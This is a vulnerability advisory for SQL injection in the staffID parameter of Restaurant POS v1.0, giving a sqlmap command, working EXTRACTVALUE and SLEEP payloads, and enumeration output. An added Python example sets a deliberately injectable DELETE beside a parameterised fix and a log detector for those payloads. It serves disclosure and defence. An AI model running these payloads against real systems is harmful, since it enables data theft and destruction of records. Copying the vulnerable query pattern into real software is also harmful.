=============================================================================================================================================
| # Title : Restaurant POS v1.0 SQL injection Vulnerability
| # Author : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)
| # Vendor : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Injection point : admin/deletestaff.php?staffID=1 (GET parameter 'staffID')

[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

[+] sqlmap output :

---
GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:
---
Parameter: staffID (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)
---
[22:32:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.30, Apache 2.4.58, PHP
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[22:32:22] [INFO] fetching database names
[22:32:22] [INFO] starting 7 threads
[22:32:22] [INFO] retrieved: 'bangresto'
[22:32:22] [INFO] retrieved: 'cms'
[22:32:22] [INFO] retrieved: 'phpmyadmin'
[22:32:22] [INFO] retrieved: 'mysql'
[22:32:22] [INFO] retrieved: 'test'
[22:32:22] [INFO] retrieved: 'information_schema'
[22:32:22] [INFO] retrieved: 'performance_schema'

available databases [7]:
[*] bangresto

[*] ending @ 22:32:22 /2024-08-16/

Note : deletestaff.php is a destructive endpoint (it deletes a staff record). --risk=3 enables sqlmap's OR-based boolean tests, which inside a DELETE ... WHERE clause can remove every row of the table, so run this only against a disposable copy of the application. The unauthenticated reachability of the admin/ script is not established by the output above; the PoC was run against a local install.

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
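The advisory shows only sqlmap's two probes (error-based EXTRACTVALUE and time-based SLEEP); it does not show the source of deletestaff.php or a fix. The block below is an added example written for this page, not code from the advisory or from the Restaurant POS project. It reproduces the flaw class on an in-memory SQLite table with an assumed schema (a `staff` table whose only named column is `staffID`, as in the advisory's URL), contrasts it with a parameterised DELETE, and runs a small detector for the advisory's two payload shapes over constructed Apache access-log lines. The log lines, table contents and the `delete_staff_*` function names are all assumptions for illustration; the MySQL-specific EXTRACTVALUE/SLEEP payloads are not executed because SQLite lacks those functions, so the tautology `1 OR 1=1` stands in for them.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the real bangresto schema (not on the page):
    # an integer staffID key and a name column, three seeded rows.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE staff (staffID INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO staff VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    conn.commit()
    return conn


def delete_staff_vulnerable(conn: sqlite3.Connection, staff_id: str) -> int:
    # The flaw class behind deletestaff.php?staffID=...: the GET value is
    # concatenated into the statement, so the caller controls the WHERE clause.
    cur = conn.execute(f"DELETE FROM staff WHERE staffID = {staff_id}")
    conn.commit()
    return cur.rowcount  # rows actually deleted


def delete_staff_safe(conn: sqlite3.Connection, staff_id: str) -> int:
    # Hardened form: type-check the ID and bind it as a parameter, so the value
    # is data to the SQL engine and can never extend the WHERE clause.
    try:
        value = int(staff_id)
    except ValueError:
        return 0  # reject anything that is not a plain integer ID
    cur = conn.execute("DELETE FROM staff WHERE staffID = ?", (value,))
    conn.commit()
    return cur.rowcount


def count_staff(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM staff").fetchone()[0]


# Signatures of the two techniques the advisory reports (MySQL error-based via
# EXTRACTVALUE, time-based via SLEEP) plus the OR-tautology used above.
SQLI_PATTERNS = re.compile(
    r"\bEXTRACTVALUE\s*\(|\bSLEEP\s*\(|\bOR\s+\d+\s*=\s*\d+", re.IGNORECASE)

# Constructed Apache combined-format lines, percent-encoded as a browser or
# sqlmap would send them; not taken from any real server.
ACCESS_LOG = """\
127.0.0.1 - - [16/Aug/2024:22:32:01 +0100] "GET /bangresto-main/admin/deletestaff.php?staffID=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [16/Aug/2024:22:32:05 +0100] "GET /bangresto-main/admin/deletestaff.php?staffID=1%20AND%20EXTRACTVALUE%285264%2CCONCAT%280x5c%2C0x71787a7171%29%29 HTTP/1.1" 500 233 "-" "Mozilla/5.0"
127.0.0.1 - - [16/Aug/2024:22:32:11 +0100] "GET /bangresto-main/admin/deletestaff.php?staffID=1%20AND%20%28SELECT%203481%20FROM%20%28SELECT%28SLEEP%285%29%29%29frXm%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [16/Aug/2024:22:32:20 +0100] "GET /bangresto-main/admin/deletestaff.php?staffID=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def flag_requests(access_log: str) -> list:
    """Return (parameter name, decoded value) for every query-string parameter
    in the log whose URL-decoded value matches one of the signatures."""
    hits = []
    for line in access_log.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes the values, so encoded payloads are caught.
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if SQLI_PATTERNS.search(value):
                    hits.append((name, value))
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable deleted", delete_staff_vulnerable(db, "1 OR 1=1"), "rows")
    db = make_db()
    print("safe deleted", delete_staff_safe(db, "1 OR 1=1"), "rows")
    for name, value in flag_requests(ACCESS_LOG):
        print("flagged", name, "=", value)
```

The PHP equivalent of `delete_staff_safe` is `(int)$_GET['staffID']` followed by a `mysqli` or PDO prepared statement with the value bound as a parameter; whether the project's own deletestaff.php does anything like that is not shown on the page. The detector is deliberately narrow (the three tokens sqlmap used here); a production rule should decode the query string as this one does and match the broader SQL keyword set rather than just these signatures.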